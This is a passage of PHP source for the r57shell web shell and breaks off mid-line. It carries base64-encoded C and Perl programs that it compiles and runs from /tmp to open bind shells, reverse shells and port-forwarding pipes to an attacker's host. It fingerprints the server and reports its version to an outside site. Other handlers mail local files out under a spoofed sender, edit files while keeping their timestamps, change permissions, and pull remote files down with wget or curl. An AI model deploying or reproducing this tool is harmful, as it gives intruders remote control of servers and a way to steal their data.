+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +if($unix) + { + if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; } + if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; } + if($safe_mode) { $sysctl = '-'; } + else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; } + else + { + $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease'); + if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); } + if(empty($sysctl)) { $sysctl = '-'; } + setcookie('sysctl',$sysctl); + } + } +echo $head; +echo ''; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print ""; +@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}} +echo '
    '.ws(2).'!'.ws(2).'r57shell '.$version.''; +echo ws(2)."".date ("d-m-Y H:i:s").""; +echo ws(2).$lb." phpinfo ".$rb; +echo ws(2).$lb." php.ini ".$rb; +if($unix) + { + echo ws(2).$lb." cpu ".$rb; + echo ws(2).$lb." mem ".$rb; + echo ws(2).$lb." users ".$rb; + } +echo ws(2).$lb." tmp ".$rb; +echo ws(2).$lb." delete ".$rb."
    "; +echo ws(2)."safe_mode: "; +echo (($safe_mode)?("ON"):("OFF")); +echo "".ws(2); +echo "PHP version: ".@phpversion().""; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("ON"):("OFF")); +echo "".ws(2); +echo "MySQL: "; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "ON"; } else { echo "OFF"; } +echo "".ws(2); +echo "MSSQL: "; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "ON";}else{echo "OFF";} +echo "".ws(2); +echo "PostgreSQL: "; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "ON";}else{echo "OFF";} +echo "".ws(2); +echo "Oracle: "; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "ON";}else{echo "OFF";} +echo "
    ".ws(2); +echo "Disable functions : "; +if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +echo "
    ".ws(2)."Free space : ".view_size($free)." Total space: ".view_size($all).""; +echo '
    +
    +
    '; +echo $font; +if($unix){ +echo 'uname -a :'.ws(1).'
    sysctl :'.ws(1).'
    $OSTYPE :'.ws(1).'
    Server :'.ws(1).'
    id :'.ws(1).'
    pwd :'.ws(1).'

    '; +echo "
    "; +echo ""; +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."
    "):(ws(3).@substr(@php_uname(),0,120)."
    ")); +echo ws(3).$sysctl."
    "; +echo ws(3).ex('echo $OSTYPE')."
    "; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
    "; +if(!empty($id)) { echo ws(3).$id."
    "; } +else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid')) + { + $euserinfo = @posix_getpwuid(@posix_geteuid()); + $egroupinfo = @posix_getgrgid(@posix_getegid()); + echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )
    '; + } +else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."
    "; +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "
    "; +} +else +{ +echo 'OS :'.ws(1).'
    Server :'.ws(1).'
    User :'.ws(1).'
    pwd :'.ws(1).'

    '; +echo "
    "; +echo ""; +echo ws(3).@substr(@php_uname(),0,120)."
    "; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
    "; +echo ws(3).@getenv("USERNAME")."
    "; +echo ws(3).$dir; +echo "
    "; +} +echo ""; +echo "
    "; +if(empty($c1)||empty($c2)) { die(); } +$f = '
    '; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n"); + err(6+$res); + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + err(6+$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "
    ".$lang[$language.'_text61']."
    "; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "
    ".$lang[$language.'_text63']."
    "; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "
    ".$lang[$language.'_text62']."
    "; + } + else { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "
    ".$lang[$language.'_text64']."
    "; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "
    "; + echo ws(3)."".$_POST['e_name'].""; + echo "
    "; + echo ""; + echo ""; + echo ""; + echo (!empty($only_read)?("

    ".$lang[$language.'_text44']):("

    ")); + echo "
    "; + echo "
    "; + echo "
    "; + echo ""; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + $mtime = @filemtime($_POST['e_name']); + if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); } + else { + if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); + @fwrite($file,$_POST['e_text']); + @touch($_POST['e_name'],$mtime,$mtime); + $_POST['cmd']=""; + echo "
    ".$lang[$language.'_text45']."
    "; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("
    Error uploading file ".$HTTP_POST_FILES['userfile']['name']."
    "); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." 